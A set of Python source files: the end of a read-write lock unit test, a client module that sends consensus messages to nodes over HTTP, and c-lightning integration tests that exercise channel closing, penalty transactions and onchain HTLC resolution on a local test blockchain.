self.exceptions[current_thread().name] = ex
def test_unthreaded(self):
try:
self.lock.acquireRead(timeout=0.01)
self.lock.acquireWrite(timeout=0.01)
self.lock.acquireRead(timeout=0.01)
self.lock.acquireWrite(timeout=0.01)
except Exception, ex:
raise ex
finally:
try:
self.lock.release()
except:
pass
def test_deadlock(self):
self.reset()
try:
w = []
for i in range(0, 10):
w.append(Thread(target=self._rww, name="w%s" % i))
for i in range(0, 10):
w[i].start()
for i in range(0, 10):
w[i].join()
for i in range(0, 10):
self._raise(w[i])
assert False
except ValueError, ex:
pass
def test_2_readers_and_3_writers(self):
self.reset()
w1 = Thread(target=self.writer, name="w1")
w2 = Thread(target=self.writer, name="w2")
w3 = Thread(target=self.timeout_writer, name="w3", args=[0.01])
r1 = Thread(target=self.reader, name="r1", args=[2])
r2 = Thread(target=self.reader, name="r2", args=[2])
w1.start()
r1.start()
w2.start()
w3.start()
r2.start()
w1.join(timeout=60)
self._raise(w1)
r1.join(timeout=60)
self._raise(r1)
r2.join(timeout=60)
self._raise(r2)
w2.join(timeout=60)
w3.join(timeout=60)
try:
self._raise(w3)
assert False
except ValueError:
pass
except RuntimeError:
pass
|
client.py | import collections
from multiprocessing import Process, Queue
import urllib
import requests
from bos_consensus.common import Message
from bos_consensus.util import logger
MessageInfo = collections.namedtuple(
'MessageInfo',
('ip', 'port', 'message'),
)
def send_message(message_info):
assert isinstance(message_info, MessageInfo)
log = logger.get_logger('client')
log.debug('loaded message: %s', message_info)
endpoint = 'http://%s:%s' % (message_info.ip, message_info.port)
try:
message = Message.new(message_info.message)
response = requests.post(
urllib.parse.urljoin(endpoint, '/send_message'),
data=message.serialize(to_string=True),
)
response.raise_for_status()
log.debug('message sent!')
except Exception as e:
log.error("ConnectionError occurred during client send message to '%s'!" % endpoint)
return
return message
def _send_message_multiple_one(queue, message, endpoint):
log = logger.get_logger('client')
try:
response = requests.post(
endpoint.join('/send_message'),
data=message.serialize(to_string=True),
)
response.raise_for_status()
log.debug('sent message, %s to %s', message, endpoint)
except Exception as e:
log.error("failed to send message, %s to %s", message, endpoint)
queue.put(False)
return
queue.put(True)
return
def _send_message_multiple(queue, message, endpoint):
create_new_message = message is None
messages = [message] if message is not None else list()
number_of_messages = int(endpoint.get('m', 1))
q = Queue(maxsize=number_of_messages)
for i in range(number_of_messages):
if create_new_message:
messages.append(Message.new())
p = Process(target=_send_message_multiple_one, args=(q, messages[-1], endpoint))
p.start()
while not q.full():
pass
queue.put(messages)
return
def send_message_multiple(message, *endpoints):
q = Queue(maxsize=len(endpoints))
for endpoint in endpoints:
p = Process(target=_send_message_multiple, args=(q, message, endpoint))
p.start()
while not q.full():
pass
messages = list()
for i in endpoints:
messages.extend(map(lambda x: (x, i), q.get()))
return messages
|
test_closing.py | from fixtures import * # noqa: F401,F403
from lightning import RpcError
from utils import only_one, sync_blockheight, wait_for, DEVELOPER, TIMEOUT, VALGRIND, SLOW_MACHINE
import queue
import pytest
import re
import threading
import unittest
@unittest.skipIf(not DEVELOPER, "Too slow without --dev-bitcoind-poll")
def test_closing(node_factory, bitcoind):
l1, l2 = node_factory.line_graph(2)
chan = l1.get_channel_scid(l2)
l1.pay(l2, 200000000)
assert bitcoind.rpc.getmempoolinfo()['size'] == 0
billboard = only_one(l1.rpc.listpeers(l2.info['id'])['peers'][0]['channels'])['status']
assert billboard == ['CHANNELD_NORMAL:Funding transaction locked.']
billboard = only_one(l2.rpc.listpeers(l1.info['id'])['peers'][0]['channels'])['status']
assert billboard == ['CHANNELD_NORMAL:Funding transaction locked.']
bitcoind.generate_block(5)
# Only wait for the channels to activate with DEVELOPER=1,
# otherwise it's going to take too long because of the missing
# --dev-broadcast-interval
if DEVELOPER:
wait_for(lambda: len(l1.getactivechannels()) == 2)
wait_for(lambda: len(l2.getactivechannels()) == 2)
billboard = only_one(l1.rpc.listpeers(l2.info['id'])['peers'][0]['channels'])['status']
# This may either be from a local_update or an announce, so just
# check for the substring
assert 'CHANNELD_NORMAL:Funding transaction locked.' in billboard[0]
# This should return with an error, then close.
with pytest.raises(RpcError, match=r'Channel close negotiation not finished'):
l1.rpc.close(chan, False, 0)
l1.daemon.wait_for_log(' to CHANNELD_SHUTTING_DOWN')
l2.daemon.wait_for_log(' to CHANNELD_SHUTTING_DOWN')
l1.daemon.wait_for_log(' to CLOSINGD_SIGEXCHANGE')
l2.daemon.wait_for_log(' to CLOSINGD_SIGEXCHANGE')
# And should put closing into mempool.
l1.daemon.wait_for_log('sendrawtx exit 0')
l2.daemon.wait_for_log('sendrawtx exit 0')
# Both nodes should have disabled the channel in their view
wait_for(lambda: len(l1.getactivechannels()) == 0)
wait_for(lambda: len(l2.getactivechannels()) == 0)
assert bitcoind.rpc.getmempoolinfo()['size'] == 1
# Now grab the close transaction
closetxid = only_one(bitcoind.rpc.getrawmempool(False))
billboard = only_one(l1.rpc.listpeers(l2.info['id'])['peers'][0]['channels'])['status']
assert billboard == ['CLOSINGD_SIGEXCHANGE:We agreed on a closing fee of 5430 satoshi']
bitcoind.generate_block(1)
l1.daemon.wait_for_log(r'Owning output .* txid %s' % closetxid)
l2.daemon.wait_for_log(r'Owning output .* txid %s' % closetxid)
# Make sure both nodes have grabbed their close tx funds
assert closetxid in set([o['txid'] for o in l1.rpc.listfunds()['outputs']])
assert closetxid in set([o['txid'] for o in l2.rpc.listfunds()['outputs']])
wait_for(lambda: only_one(l1.rpc.listpeers(l2.info['id'])['peers'][0]['channels'])['status'] == [
'CLOSINGD_SIGEXCHANGE:We agreed on a closing fee of 5430 satoshi',
'ONCHAIN:Tracking mutual close transaction',
'ONCHAIN:All outputs resolved: waiting 99 more blocks before forgetting channel'
])
bitcoind.generate_block(9)
wait_for(lambda: only_one(l1.rpc.listpeers(l2.info['id'])['peers'][0]['channels'])['status'] == [
'CLOSINGD_SIGEXCHANGE:We agreed on a closing fee of 5430 satoshi',
'ONCHAIN:Tracking mutual close transaction',
'ONCHAIN:All outputs resolved: waiting 90 more blocks before forgetting channel'
])
# Make sure both have forgotten about it
bitcoind.generate_block(90)
wait_for(lambda: len(l1.rpc.listchannels()['channels']) == 0)
wait_for(lambda: len(l2.rpc.listchannels()['channels']) == 0)
def test_closing_while_disconnected(node_factory, bitcoind):
l1, l2 = node_factory.line_graph(2, opts={'may_reconnect': True})
chan = l1.get_channel_scid(l2)
l1.pay(l2, 200000000)
l2.stop()
# The close should still be triggered afterwards.
with pytest.raises(RpcError, match=r'Channel close negotiation not finished'):
l1.rpc.close(chan, False, 0)
l1.daemon.wait_for_log(' to CHANNELD_SHUTTING_DOWN')
l2.start()
l1.daemon.wait_for_log(' to CLOSINGD_SIGEXCHANGE')
l2.daemon.wait_for_log(' to CLOSINGD_SIGEXCHANGE')
# And should put closing into mempool.
l1.daemon.wait_for_log('sendrawtx exit 0')
l2.daemon.wait_for_log('sendrawtx exit 0')
bitcoind.generate_block(101)
wait_for(lambda: len(l1.rpc.listchannels()['channels']) == 0)
wait_for(lambda: len(l2.rpc.listchannels()['channels']) == 0)
def test_closing_id(node_factory):
"""Test closing using peer ID and full channel ID
"""
l1, l2 = node_factory.get_nodes(2)
# Close by full channel ID.
l1.rpc.connect(l2.info['id'], 'localhost', l2.port)
l1.fund_channel(l2, 10**6)
cid = l2.rpc.listpeers()['peers'][0]['channels'][0]['channel_id']
l2.rpc.close(cid)
wait_for(lambda: not only_one(l1.rpc.listpeers(l2.info['id'])['peers'])['connected'])
wait_for(lambda: not only_one(l2.rpc.listpeers(l1.info['id'])['peers'])['connected'])
# Close by peer ID.
l2.rpc.connect(l1.info['id'], 'localhost', l1.port)
l1.daemon.wait_for_log("Handed peer, entering loop")
l2.fund_channel(l1, 10**6)
pid = l1.info['id']
l2.rpc.close(pid)
wait_for(lambda: not only_one(l1.rpc.listpeers(l2.info['id'])['peers'])['connected'])
wait_for(lambda: not only_one(l2.rpc.listpeers(l1.info['id'])['peers'])['connected'])
@unittest.skipIf(not DEVELOPER, "needs dev-rescan-outputs")
def test_closing_torture(node_factory, executor, bitcoind):
l1, l2 = node_factory.get_nodes(2)
amount = 10**6
# Before the fix was applied, 15 would often pass.
# However, increasing the number of tries would
# take longer in VALGRIND mode, triggering a CI
# failure since the test does not print any
# output.
# On my laptop, VALGRIND is about 4x slower than native, hence
# the approximations below:
iterations = 50
if VALGRIND:
iterations //= 4
if SLOW_MACHINE:
iterations //= 2
for i in range(iterations):
# Reduce probability that spurious sendrawtx error will occur
l1.rpc.dev_rescan_outputs()
# Create a channel.
l1.rpc.connect(l2.info['id'], 'localhost', l2.port)
l1.fund_channel(l2, amount)
scid = l1.get_channel_scid(l2)
# Get it confirmed.
l1.bitcoin.generate_block(6)
# Wait for it to go to CHANNELD_NORMAL
l1.wait_channel_active(scid)
l2.wait_channel_active(scid)
# Start closers: can take a long time under valgrind!
c1 = executor.submit(l1.rpc.close, l2.info['id'], False, 60)
c2 = executor.submit(l2.rpc.close, l1.info['id'], False, 60)
# Wait for close to finish
c1.result(TIMEOUT)
c2.result(TIMEOUT)
wait_for(lambda: len(bitcoind.rpc.getrawmempool(False)) == 1)
# Get close confirmed
l1.bitcoin.generate_block(100)
wait_for(lambda: len(l1.rpc.listpeers()['peers']) == 0)
wait_for(lambda: len(l2.rpc.listpeers()['peers']) == 0)
@unittest.skipIf(SLOW_MACHINE and VALGRIND, "slow test")
def test_closing_different_fees(node_factory, bitcoind, executor):
l1 = node_factory.get_node()
# Default feerate = 15000/7500/1000
# It will start at the second number, accepting anything above the first.
feerates = [[20000, 15000, 7400], [8000, 1001, 100]]
amounts = [0, 545999, 546000]
num_peers = len(feerates) * len(amounts)
addr = l1.rpc.newaddr()['address']
bitcoind.rpc.sendtoaddress(addr, 1)
numfunds = len(l1.rpc.listfunds()['outputs'])
bitcoind.generate_block(1)
wait_for(lambda: len(l1.rpc.listfunds()['outputs']) > numfunds)
# Create them in a batch, for speed!
peers = []
for feerate in feerates:
for amount in amounts:
p = node_factory.get_node(feerates=feerate)
p.feerate = feerate
p.amount = amount
l1.rpc.connect(p.info['id'], 'localhost', p.port)
peers.append(p)
for p in peers:
p.channel = l1.rpc.fundchannel(p.info['id'], 10**6)['channel_id']
# Technically, this is async to fundchannel returning.
l1.daemon.wait_for_log('sendrawtx exit 0')
bitcoind.generate_block(6)
# Now wait for them all to hit normal state, do payments
l1.daemon.wait_for_logs(['update for channel .* now ACTIVE'] * num_peers
+ ['to CHANNELD_NORMAL'] * num_peers)
for p in peers:
if p.amount != 0:
l1.pay(p, 100000000)
# Now close all channels
# All closes occur in parallel, and on Travis,
# ALL those lightningd are running on a single core,
# so increase the timeout so that this test will pass
# when valgrind is enabled.
# (close timeout defaults to 30 as of this writing)
closes = [executor.submit(l1.rpc.close, p.channel, False, 90) for p in peers]
for c in closes:
c.result(90)
# close does *not* wait for the sendrawtransaction, so do that!
# Note that since they disagree on the ideal fee, they may conflict
# (first one in will win), so we cannot look at logs, we need to
# wait for mempool.
wait_for(lambda: bitcoind.rpc.getmempoolinfo()['size'] == num_peers)
bitcoind.generate_block(1)
for p in peers:
p.daemon.wait_for_log(' to ONCHAIN')
wait_for(lambda: 'ONCHAIN:Tracking mutual close transaction' in only_one(p.rpc.listpeers(l1.info['id'])['peers'][0]['channels'])['status'])
l1.daemon.wait_for_logs([' to ONCHAIN'] * num_peers)
@unittest.skipIf(not DEVELOPER, "needs DEVELOPER=1")
def test_closing_negotiation_reconnect(node_factory, bitcoind):
disconnects = ['-WIRE_CLOSING_SIGNED',
'@WIRE_CLOSING_SIGNED',
'+WIRE_CLOSING_SIGNED']
l1 = node_factory.get_node(disconnect=disconnects, may_reconnect=True)
l2 = node_factory.get_node(may_reconnect=True)
l1.rpc.connect(l2.info['id'], 'localhost', l2.port)
chan = l1.fund_channel(l2, 10**6)
l1.pay(l2, 200000000)
assert bitcoind.rpc.getmempoolinfo()['size'] == 0
# This should return with an error, then close.
with pytest.raises(RpcError, match=r'Channel close negotiation not finished'):
l1.rpc.close(chan, False, 0)
l1.daemon.wait_for_log(' to CHANNELD_SHUTTING_DOWN')
l2.daemon.wait_for_log(' to CHANNELD_SHUTTING_DOWN')
l1.daemon.wait_for_log(' to CLOSINGD_SIGEXCHANGE')
l2.daemon.wait_for_log(' to CLOSINGD_SIGEXCHANGE')
# And should put closing into mempool (happens async, so
# CLOSINGD_COMPLETE may come first).
l1.daemon.wait_for_logs(['sendrawtx exit 0', ' to CLOSINGD_COMPLETE'])
l2.daemon.wait_for_logs(['sendrawtx exit 0', ' to CLOSINGD_COMPLETE'])
assert bitcoind.rpc.getmempoolinfo()['size'] == 1
@unittest.skipIf(not DEVELOPER, "needs DEVELOPER=1")
def test_penalty_inhtlc(node_factory, bitcoind, executor):
"""Test penalty transaction with an incoming HTLC"""
# We suppress each one after first commit; HTLC gets added not fulfilled.
# Feerates identical so we don't get gratuitous commit to update them
l1 = node_factory.get_node(disconnect=['=WIRE_COMMITMENT_SIGNED-nocommit'], may_fail=True, feerates=(7500, 7500, 7500))
l2 = node_factory.get_node(disconnect=['=WIRE_COMMITMENT_SIGNED-nocommit'])
l1.rpc.connect(l2.info['id'], 'localhost', l2.port)
l1.fund_channel(l2, 10**6)
# Now, this will get stuck due to l1 commit being disabled..
t = executor.submit(l1.pay, l2, 100000000)
assert len(l1.getactivechannels()) == 2
assert len(l2.getactivechannels()) == 2
# They should both have commitments blocked now.
l1.daemon.wait_for_log('=WIRE_COMMITMENT_SIGNED-nocommit')
l2.daemon.wait_for_log('=WIRE_COMMITMENT_SIGNED-nocommit')
# Make sure l1 got l2's commitment to the HTLC, and sent to master.
l1.daemon.wait_for_log('UPDATE WIRE_CHANNEL_GOT_COMMITSIG')
# Take our snapshot.
tx = l1.rpc.dev_sign_last_tx(l2.info['id'])['tx']
# Let them continue
l1.rpc.dev_reenable_commit(l2.info['id'])
l2.rpc.dev_reenable_commit(l1.info['id'])
# Should fulfill.
l1.daemon.wait_for_log('peer_in WIRE_UPDATE_FULFILL_HTLC')
l1.daemon.wait_for_log('peer_out WIRE_REVOKE_AND_ACK')
l2.daemon.wait_for_log('peer_out WIRE_UPDATE_FULFILL_HTLC')
l1.daemon.wait_for_log('peer_in WIRE_REVOKE_AND_ACK')
# Payment should now complete.
t.result(timeout=10)
# Now we really mess things up!
bitcoind.rpc.sendrawtransaction(tx)
bitcoind.generate_block(1)
l2.daemon.wait_for_log(' to ONCHAIN')
# FIXME: l1 should try to stumble along!
wait_for(lambda: len(l2.getactivechannels()) == 0)
# l2 should spend all of the outputs (except to-us).
# Could happen in any order, depending on commitment tx.
needle = l2.daemon.logsearch_start
l2.wait_for_onchaind_broadcast('OUR_PENALTY_TX',
'THEIR_REVOKED_UNILATERAL/DELAYED_OUTPUT_TO_THEM')
l2.daemon.logsearch_start = needle
l2.wait_for_onchaind_broadcast('OUR_PENALTY_TX',
'THEIR_REVOKED_UNILATERAL/THEIR_HTLC')
# FIXME: test HTLC tx race!
# 100 blocks later, all resolved.
bitcoind.generate_block(100)
l2.daemon.wait_for_log('onchaind complete, forgetting peer')
outputs = l2.rpc.listfunds()['outputs']
assert [o['status'] for o in outputs] == ['confirmed'] * 2
# Allow some lossage for fees.
assert sum(o['value'] for o in outputs) < 10**6
assert sum(o['value'] for o in outputs) > 10**6 - 15000
@unittest.skipIf(not DEVELOPER, "needs DEVELOPER=1")
def test_penalty_outhtlc(node_factory, bitcoind, executor):
"""Test penalty transaction with an outgoing HTLC"""
# First we need to get funds to l2, so suppress after second.
# Feerates identical so we don't get gratuitous commit to update them
l1 = node_factory.get_node(disconnect=['=WIRE_COMMITMENT_SIGNED*3-nocommit'], may_fail=True, feerates=(7500, 7500, 7500))
l2 = node_factory.get_node(disconnect=['=WIRE_COMMITMENT_SIGNED*3-nocommit'])
l1.rpc.connect(l2.info['id'], 'localhost', l2.port)
l1.fund_channel(l2, 10**6)
# Move some across to l2.
l1.pay(l2, 200000000)
assert not l1.daemon.is_in_log('=WIRE_COMMITMENT_SIGNED')
assert not l2.daemon.is_in_log('=WIRE_COMMITMENT_SIGNED')
# Now, this will get stuck due to l1 commit being disabled..
t = executor.submit(l2.pay, l1, 100000000)
# Make sure we get signature from them.
l1.daemon.wait_for_log('peer_in WIRE_UPDATE_ADD_HTLC')
l1.daemon.wait_for_log('peer_in WIRE_COMMITMENT_SIGNED')
# They should both have commitments blocked now.
l1.daemon.wait_for_log('dev_disconnect: =WIRE_COMMITMENT_SIGNED')
l2.daemon.wait_for_log('dev_disconnect: =WIRE_COMMITMENT_SIGNED')
# Make sure both sides got revoke_and_ack for that commitment.
l1.daemon.wait_for_log('peer_in WIRE_REVOKE_AND_ACK')
l2.daemon.wait_for_log('peer_in WIRE_REVOKE_AND_ACK')
# Take our snapshot.
tx = l1.rpc.dev_sign_last_tx(l2.info['id'])['tx']
# Let them continue
l1.rpc.dev_reenable_commit(l2.info['id'])
l2.rpc.dev_reenable_commit(l1.info['id'])
# Thread should complete.
t.result(timeout=10)
# Make sure both sides got revoke_and_ack for final.
l1.daemon.wait_for_log('peer_in WIRE_REVOKE_AND_ACK')
l2.daemon.wait_for_log('peer_in WIRE_REVOKE_AND_ACK')
# Now we really mess things up!
bitcoind.rpc.sendrawtransaction(tx)
bitcoind.generate_block(1)
l2.daemon.wait_for_log(' to ONCHAIN')
# FIXME: l1 should try to stumble along!
# l2 should spend all of the outputs (except to-us).
# Could happen in any order, depending on commitment tx.
needle = l2.daemon.logsearch_start
l2.wait_for_onchaind_broadcast('OUR_PENALTY_TX',
'THEIR_REVOKED_UNILATERAL/DELAYED_OUTPUT_TO_THEM')
l2.daemon.logsearch_start = needle
l2.wait_for_onchaind_broadcast('OUR_PENALTY_TX',
'THEIR_REVOKED_UNILATERAL/OUR_HTLC')
l2.daemon.logsearch_start = needle
l2.daemon.wait_for_log('Ignoring output.*: THEIR_REVOKED_UNILATERAL/OUTPUT_TO_US')
# FIXME: test HTLC tx race!
# 100 blocks later, all resolved.
bitcoind.generate_block(100)
wait_for(lambda: len(l2.rpc.listpeers()['peers']) == 0)
outputs = l2.rpc.listfunds()['outputs']
assert [o['status'] for o in outputs] == ['confirmed'] * 3
# Allow some lossage for fees.
assert sum(o['value'] for o in outputs) < 10**6
assert sum(o['value'] for o in outputs) > 10**6 - 15000
@unittest.skipIf(not DEVELOPER, "needs DEVELOPER=1")
def test_onchain_first_commit(node_factory, bitcoind):
"""Onchain handling where funder immediately drops to chain"""
# HTLC 1->2, 1 fails just after funding.
disconnects = ['+WIRE_FUNDING_LOCKED', 'permfail']
l1 = node_factory.get_node(disconnect=disconnects)
# Make locktime different, as we once had them reversed!
l2 = node_factory.get_node(options={'watchtime-blocks': 10})
l1.fundwallet(10**7)
l1.rpc.connect(l2.info['id'], 'localhost', l2.port)
l1.rpc.fundchannel(l2.info['id'], 10**6)
l1.daemon.wait_for_log('sendrawtx exit 0')
l1.bitcoin.generate_block(1)
# l1 will drop to chain.
l1.daemon.wait_for_log('permfail')
l1.daemon.wait_for_log('sendrawtx exit 0')
l1.bitcoin.generate_block(1)
l1.daemon.wait_for_log(' to ONCHAIN')
l2.daemon.wait_for_log(' to ONCHAIN')
# 10 later, l1 should collect its to-self payment.
bitcoind.generate_block(10)
l1.wait_for_onchaind_broadcast('OUR_DELAYED_RETURN_TO_WALLET',
'OUR_UNILATERAL/DELAYED_OUTPUT_TO_US')
# 94 later, l2 is done.
bitcoind.generate_block(94)
l2.daemon.wait_for_log('onchaind complete, forgetting peer')
# Now, 100 blocks and l1 should be done.
bitcoind.generate_block(6)
l1.daemon.wait_for_log('onchaind complete, forgetting peer')
@unittest.skipIf(not DEVELOPER, "needs DEVELOPER=1")
def test_onchain_unwatch(node_factory, bitcoind):
"""Onchaind should not watch random spends"""
l1, l2 = node_factory.line_graph(2)
l1.pay(l2, 200000000)
l1.rpc.dev_fail(l2.info['id'])
l1.daemon.wait_for_log('Failing due to dev-fail command')
l1.wait_for_channel_onchain(l2.info['id'])
l1.bitcoin.generate_block(1)
l1.daemon.wait_for_log(' to ONCHAIN')
l2.daemon.wait_for_log(' to ONCHAIN')
# 10 later, l1 should collect its to-self payment.
bitcoind.generate_block(10)
l1.wait_for_onchaind_broadcast('OUR_DELAYED_RETURN_TO_WALLET',
'OUR_UNILATERAL/DELAYED_OUTPUT_TO_US')
# First time it sees it, onchaind cares.
bitcoind.generate_block(1)
l1.daemon.wait_for_log('Resolved OUR_UNILATERAL/DELAYED_OUTPUT_TO_US by our proposal '
'OUR_DELAYED_RETURN_TO_WALLET')
# Now test unrelated onchain churn.
# Daemon gets told about wallet; says it doesn't care.
l1.rpc.withdraw(l1.rpc.newaddr()['address'], 'all')
bitcoind.generate_block(1)
l1.daemon.wait_for_log("but we don't care")
# And lightningd should respect that!
assert not l1.daemon.is_in_log("Can't unwatch txid")
# So these should not generate further messages
for i in range(5):
l1.rpc.withdraw(l1.rpc.newaddr()['address'], 'all')
bitcoind.generate_block(1)
# Make sure it digests the block
sync_blockheight(bitcoind, [l1])
# We won't see this again.
assert not l1.daemon.is_in_log("but we don't care",
start=l1.daemon.logsearch_start)
# Note: for this test we leave onchaind running, so we can detect
# any leaks!
@unittest.skipIf(not DEVELOPER, "needs DEVELOPER=1")
def test_onchaind_replay(node_factory, bitcoind):
disconnects = ['+WIRE_REVOKE_AND_ACK', 'permfail']
options = {'watchtime-blocks': 201, 'cltv-delta': 101}
# Feerates identical so we don't get gratuitous commit to update them
l1 = node_factory.get_node(options=options, disconnect=disconnects, feerates=(7500, 7500, 7500))
l2 = node_factory.get_node(options=options)
l1.rpc.connect(l2.info['id'], 'localhost', l2.port)
l1.fund_channel(l2, 10**6)
rhash = l2.rpc.invoice(10**8, 'onchaind_replay', 'desc')['payment_hash']
routestep = {
'msatoshi': 10**8 - 1,
'id': l2.info['id'],
'delay': 101,
'channel': '1x1x1'
}
l1.rpc.sendpay([routestep], rhash)
l1.daemon.wait_for_log('sendrawtx exit 0')
bitcoind.generate_block(1)
# Wait for nodes to notice the failure, this seach needle is after the
# DB commit so we're sure the tx entries in onchaindtxs have been added
l1.daemon.wait_for_log("Deleting channel .* due to the funding outpoint being spent")
l2.daemon.wait_for_log("Deleting channel .* due to the funding outpoint being spent")
# We should at least have the init tx now
assert len(l1.db_query("SELECT * FROM channeltxs;")) > 0
assert len(l2.db_query("SELECT * FROM channeltxs;")) > 0
# Generate some blocks so we restart the onchaind from DB (we rescan
# last_height - 100)
bitcoind.generate_block(100)
sync_blockheight(bitcoind, [l1, l2])
# l1 should still have a running onchaind
assert len(l1.db_query("SELECT * FROM channeltxs;")) > 0
l2.rpc.stop()
l1.restart()
# Can't wait for it, it's after the "Server started" wait in restart()
assert l1.daemon.is_in_log(r'Restarting onchaind for channel')
# l1 should still notice that the funding was spent and that we should react to it
l1.daemon.wait_for_log("Propose handling OUR_UNILATERAL/DELAYED_OUTPUT_TO_US by OUR_DELAYED_RETURN_TO_WALLET")
sync_blockheight(bitcoind, [l1])
bitcoind.generate_block(10)
sync_blockheight(bitcoind, [l1])
@unittest.skipIf(not DEVELOPER, "needs DEVELOPER=1")
def test_onchain_dust_out(node_factory, bitcoind, executor):
"""Onchain handling of outgoing dust htlcs (they should fail)"""
# HTLC 1->2, 1 fails after it's irrevocably committed
disconnects = ['@WIRE_REVOKE_AND_ACK', 'permfail']
# Feerates identical so we don't get gratuitous commit to update them
l1 = node_factory.get_node(disconnect=disconnects, feerates=(7500, 7500, 7500))
l2 = node_factory.get_node()
l1.rpc.connect(l2.info['id'], 'localhost', l2.port)
l1.fund_channel(l2, 10**6)
# Must be dust!
rhash = l2.rpc.invoice(1, 'onchain_dust_out', 'desc')['payment_hash']
routestep = {
'msatoshi': 1,
'id': l2.info['id'],
'delay': 5,
'channel': '1x1x1'
}
l1.rpc.sendpay([routestep], rhash)
payfuture = executor.submit(l1.rpc.waitsendpay, rhash)
# l1 will drop to chain.
l1.daemon.wait_for_log('permfail')
l1.wait_for_channel_onchain(l2.info['id'])
l1.bitcoin.generate_block(1)
l1.daemon.wait_for_log(' to ONCHAIN')
l2.daemon.wait_for_log(' to ONCHAIN')
# We use 3 blocks for "reasonable depth"
bitcoind.generate_block(3)
# It should fail.
with pytest.raises(RpcError, match=r'WIRE_PERMANENT_CHANNEL_FAILURE: missing in commitment tx'):
payfuture.result(5)
# Retry payment, this should fail (and, as a side-effect, tickle a
# bug).
with pytest.raises(RpcError, match=r'WIRE_UNKNOWN_NEXT_PEER'):
l1.rpc.sendpay([routestep], rhash)
# 6 later, l1 should collect its to-self payment.
bitcoind.generate_block(6)
l1.wait_for_onchaind_broadcast('OUR_DELAYED_RETURN_TO_WALLET',
'OUR_UNILATERAL/DELAYED_OUTPUT_TO_US')
# 94 later, l2 is done.
bitcoind.generate_block(94)
l2.daemon.wait_for_log('onchaind complete, forgetting peer')
# Restart l1, it should not crash!
l1.restart()
# Now, 100 blocks and l1 should be done.
bitcoind.generate_block(6)
l1.daemon.wait_for_log('onchaind complete, forgetting peer')
# Payment failed, BTW
assert only_one(l2.rpc.listinvoices('onchain_dust_out')['invoices'])['status'] == 'unpaid'
@unittest.skipIf(not DEVELOPER, "needs DEVELOPER=1")
def test_onchain_timeout(node_factory, bitcoind, executor):
"""Onchain handling of outgoing failed htlcs"""
# HTLC 1->2, 1 fails just after it's irrevocably committed
disconnects = ['+WIRE_REVOKE_AND_ACK*3', 'permfail']
# Feerates identical so we don't get gratuitous commit to update them
l1 = node_factory.get_node(disconnect=disconnects, feerates=(7500, 7500, 7500))
l2 = node_factory.get_node()
l1.rpc.connect(l2.info['id'], 'localhost', l2.port)
l1.fund_channel(l2, 10**6)
rhash = l2.rpc.invoice(10**8, 'onchain_timeout', 'desc')['payment_hash']
# We underpay, so it fails.
routestep = {
'msatoshi': 10**8 - 1,
'id': l2.info['id'],
'delay': 5,
'channel': '1x1x1'
}
l1.rpc.sendpay([routestep], rhash)
with pytest.raises(RpcError):
l1.rpc.waitsendpay(rhash)
# Make sure CLTVs are different, in case it confuses onchaind.
bitcoind.generate_block(1)
sync_blockheight(bitcoind, [l1])
# Second one will cause drop to chain.
l1.rpc.sendpay([routestep], rhash)
payfuture = executor.submit(l1.rpc.waitsendpay, rhash)
# l1 will drop to chain.
l1.daemon.wait_for_log('permfail')
l1.wait_for_channel_onchain(l2.info['id'])
l1.bitcoin.generate_block(1)
l1.daemon.wait_for_log(' to ONCHAIN')
l2.daemon.wait_for_log(' to ONCHAIN')
# Wait for timeout.
l1.daemon.wait_for_logs(['Propose handling OUR_UNILATERAL/DELAYED_OUTPUT_TO_US by OUR_DELAYED_RETURN_TO_WALLET .* after 5 blocks',
'Propose handling OUR_UNILATERAL/OUR_HTLC by OUR_HTLC_TIMEOUT_TX .* after 6 blocks'])
bitcoind.generate_block(4)
l1.wait_for_onchaind_broadcast('OUR_DELAYED_RETURN_TO_WALLET',
'OUR_UNILATERAL/DELAYED_OUTPUT_TO_US')
bitcoind.generate_block(1)
l1.wait_for_onchaind_broadcast('OUR_HTLC_TIMEOUT_TX',
'OUR_UNILATERAL/OUR_HTLC')
# We use 3 blocks for "reasonable depth"
bitcoind.generate_block(3)
# It should fail.
with pytest.raises(RpcError, match=r'WIRE_PERMANENT_CHANNEL_FAILURE: timed out'):
payfuture.result(5)
# 2 later, l1 spends HTLC (5 blocks total).
bitcoind.generate_block(2)
l1.wait_for_onchaind_broadcast('OUR_DELAYED_RETURN_TO_WALLET',
'OUR_HTLC_TIMEOUT_TX/DELAYED_OUTPUT_TO_US')
# 89 later, l2 is done.
bitcoind.generate_block(89)
l2.daemon.wait_for_log('onchaind complete, forgetting peer')
# Now, 100 blocks and l1 should be done.
bitcoind.generate_block(10)
sync_blockheight(bitcoind, [l1])
assert not l1.daemon.is_in_log('onchaind complete, forgetting peer')
bitcoind.generate_block(1)
l1.daemon.wait_for_log('onchaind complete, forgetting peer')
# Payment failed, BTW
assert only_one(l2.rpc.listinvoices('onchain_timeout')['invoices'])['status'] == 'unpaid'
@unittest.skipIf(not DEVELOPER, "needs DEVELOPER=1")
def test_onchain_middleman(node_factory, bitcoind):
# HTLC 1->2->3, 1->2 goes down after 2 gets preimage from 3.
disconnects = ['-WIRE_UPDATE_FULFILL_HTLC', 'permfail']
l1 = node_factory.get_node()
l2 = node_factory.get_node(disconnect=disconnects)
l3 = node_factory.get_node()
# l2 connects to both, so l1 can't reconnect and thus l2 drops to chain
l2.rpc.connect(l1.info['id'], 'localhost', l1.port)
l2.rpc.connect(l3.info['id'], 'localhost', l3.port)
l2.fund_channel(l1, 10**6)
c23 = l2.fund_channel(l3, 10**6)
# Make sure routes finalized.
bitcoind.generate_block(5)
l1.wait_channel_active(c23)
# Give l1 some money to play with.
l2.pay(l1, 2 * 10**8)
# Must be bigger than dust!
rhash = l3.rpc.invoice(10**8, 'middleman', 'desc')['payment_hash']
route = l1.rpc.getroute(l3.info['id'], 10**8, 1)["route"]
assert len(route) == 2
q = queue.Queue()
def try_pay():
try:
l1.rpc.sendpay(route, rhash)
l1.rpc.waitsendpay(rhash)
q.put(None)
except Exception as err:
q.put(err)
t = threading.Thread(target=try_pay)
t.daemon = True
t.start()
# l2 will drop to chain.
l2.daemon.wait_for_log('sendrawtx exit 0')
l1.bitcoin.generate_block(1)
l2.daemon.wait_for_log(' to ONCHAIN')
l1.daemon.wait_for_log(' to ONCHAIN')
l2.daemon.wait_for_log('OUR_UNILATERAL/THEIR_HTLC')
# l2 should fulfill HTLC onchain, and spend to-us (any order)
l2.wait_for_onchaind_broadcast('OUR_HTLC_SUCCESS_TX',
'OUR_UNILATERAL/THEIR_HTLC')
# Payment should succeed.
l1.bitcoin.generate_block(1)
l1.daemon.wait_for_log('THEIR_UNILATERAL/OUR_HTLC gave us preimage')
